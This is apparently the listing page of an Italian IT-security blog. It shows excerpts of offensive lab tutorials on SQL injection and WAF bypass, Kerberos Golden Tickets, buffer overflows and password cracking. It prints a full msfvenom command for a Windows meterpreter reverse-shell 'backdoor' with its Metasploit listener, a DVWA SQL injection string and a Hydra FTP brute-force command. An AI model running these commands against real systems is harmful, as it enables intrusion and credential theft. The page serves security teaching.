sicurezza informatica

Router liberi per una rete veramente tua

Scopri perché usare un router libero è una scelta tecnica, etica e politica. Maggiore privacy, controllo della rete e rispetto del diritto europeo. Guida completa con modelli consigliati.

Etichette

Antivirus e strumenti di rilevamento su GNU/Linux e BSD: perché servono e quali usare

Spesso si pensa che i sistemi GNU/Linux o BSD siano "immuni" dai virus. È vero che questi sistemi, per la loro architettura e per la minore diffusione sul desktop rispetto a Windows, sono meno soggetti ai malware tradizionali. Ma non sono invulnerabili.

Etichette

Quanto tempo serve per violare una password semplice?

Inviato da tuxsa il Sab, 14/06/2025 - 18:44

Molte persone usano password basate su parole di senso compiuto, nomi o date di nascita. Questo le rende estremamente vulnerabili, anche se la password ha 6–8 caratteri.

Vediamo due esempi concreti:

Etichette

Recuperare la password di un PDF con John the Ripper

Inviato da tuxsa il Sab, 14/06/2025 - 18:17

John the Ripper è uno strumento open source per il recupero di password e il test di robustezza delle credenziali. In questo esempio vedremo come usarlo per recuperare la password di un file PDF protetto, in modo legale ed etico.

<a href="https://gratisography.com/photo/cat-at-door/">Photo</a> courtesy of <a href="https://gratisography.com">Gratisography</a>

Etichette

Bypass di WAF con Obfuscazione SQLi

Inviato da enzo de simone il Ven, 16/05/2025 - 17:24

Obiettivo: Eseguire una SQL Injection avanzata bypassando un Web Application Firewall (WAF).

Ambiente:

DVWA (Damn Vulnerable Web App) con ModSecurity attivo.

Tecniche utilizzate:

Commenti SQL (/**/)

Etichette

sicurezza informatica

Attacco a Kerberos (Golden Ticket Attack)

Inviato da tuxsa il Ven, 16/05/2025 - 09:27

Obiettivo: Ottenere un Golden Ticket per impersonare un amministratore di dominio in un ambiente Active Directory.

Strumenti necessari:

Impacket (su Kali Linux)
Mimikatz (su Windows)
Active Directory lab (es. Windows Server 2019 + Windows 10 client)

Etichette

sicurezza informatica

Exploit di un Buffer Overflow in un Servizio Windows (SLMail)

Inviato da tuxsa il Gio, 15/05/2025 - 18:00

Strumenti necessari:

Immunity Debugger (Windows)
Kali Linux (per generare l’exploit)
Mona.py (plugin per Immunity Debugger)
Metasploit Framework

Etichette

sicurezza informatica

Come creare una Backdoor con Msfvenom

Inviato da tuxsa il Gio, 15/05/2025 - 17:57

Genera un payload per Windows con msfvenom (parte di Metasploit):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tuo-IP> LPORT=4444 -f exe > backdoor.exe
Avvia un listener su Kali Linux con Metasploit:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <tuo-IP>
set LPORT 4444
exploit

Etichette

sicurezza informatica

Analisi di un Malware con Strings

Inviato da tuxsa il Gio, 15/05/2025 - 17:52

Scarica un file sospetto (es. da MalwareBazaar, solo per scopi didattici!).
Esegui:
strings <nome-file> | less
Cerca indirizzi IP, URL, comandi sospetti o altre informazioni.

Etichette

sicurezza informatica

SQL Injection Base

Inviato da enzo de simone il Gio, 15/05/2025 - 17:49

Usa DVWA (Damn Vulnerable Web App) su Metasploitable.

Procedura:

Accedi a DVWA (http://<indirizzo-IP-target>/dvwa) e loggati.
Vai alla sezione "SQL Injection".
Inserisci nel campo di input:
' OR '1'='1

Etichette

sicurezza informatica

Bruteforce su FTP con Hydra

Inviato da tuxsa il Gio, 15/05/2025 - 17:35

Assicurati di avere un server FTP vulnerabile (es. su Metasploitable).
Crea o scarica una wordlist (es. rockyou.txt su Kali Linux).
Esegui Hydra:
hydra -l <username> -P <percorso-wordlist> ftp://<indirizzo-IP-target>
Se il login ha successo, prova ad accedere manualmente con: